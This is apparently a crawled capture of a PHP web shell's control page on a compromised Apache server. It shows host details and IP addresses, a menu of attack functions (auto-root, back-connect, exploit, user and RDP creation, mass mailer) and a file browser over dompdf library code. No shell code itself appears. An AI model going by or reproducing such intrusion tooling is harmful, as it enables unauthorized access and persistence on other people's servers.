Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.135.186.233
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
guk_old /
libs /
dompdf-master /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Adapter
[ DIR ]
drwxr-xr-x
Css
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Frame
[ DIR ]
drwxr-xr-x
FrameDecorator
[ DIR ]
drwxr-xr-x
FrameReflower
[ DIR ]
drwxr-xr-x
Image
[ DIR ]
drwxr-xr-x
Positioner
[ DIR ]
drwxr-xr-x
Renderer
[ DIR ]
drwxr-xr-x
Autoloader.php
929
B
-rwxr-xr-x
Canvas.php
10.63
KB
-rwxr-xr-x
CanvasFactory.php
1.47
KB
-rwxr-xr-x
Cellmap.php
23.15
KB
-rwxr-xr-x
Dompdf.php
41.86
KB
-rwxr-xr-x
Exception.php
600
B
-rwxr-xr-x
FontMetrics.php
13.79
KB
-rwxr-xr-x
Frame.php
30.24
KB
-rwxr-xr-x
Helpers.php
30.28
KB
-rwxr-xr-x
JavascriptEmbedder.php
1004
B
-rwxr-xr-x
LineBox.php
7.22
KB
-rwxr-xr-x
Options.php
26.59
KB
-rwxr-xr-x
PhpEvaluator.php
1.34
KB
-rwxr-xr-x
Renderer.php
8.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CanvasFactory.php
<?php /** * @package dompdf * @link http://dompdf.github.com/ * @author Benj Carson <benjcarson@digitaljunkies.ca> * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ namespace Dompdf; /** * Create canvas instances * * The canvas factory creates canvas instances based on the * availability of rendering backends and config options. * * @package dompdf */ class CanvasFactory { /** * Constructor is private: this is a static class */ private function __construct() { } /** * @param Dompdf $dompdf * @param string|array $paper * @param string $orientation * @param string $class * * @return Canvas */ static function get_instance(Dompdf $dompdf, $paper = null, $orientation = null, $class = null) { $backend = strtolower($dompdf->getOptions()->getPdfBackend()); if (isset($class) && class_exists($class, false)) { $class .= "_Adapter"; } else { if (($backend === "auto" || $backend === "pdflib") && class_exists("PDFLib", false) ) { $class = "Dompdf\\Adapter\\PDFLib"; } else { if ($backend === "gd") { $class = "Dompdf\\Adapter\\GD"; } else { $class = "Dompdf\\Adapter\\CPDF"; } } } return new $class($paper, $orientation, $dompdf); } }
Close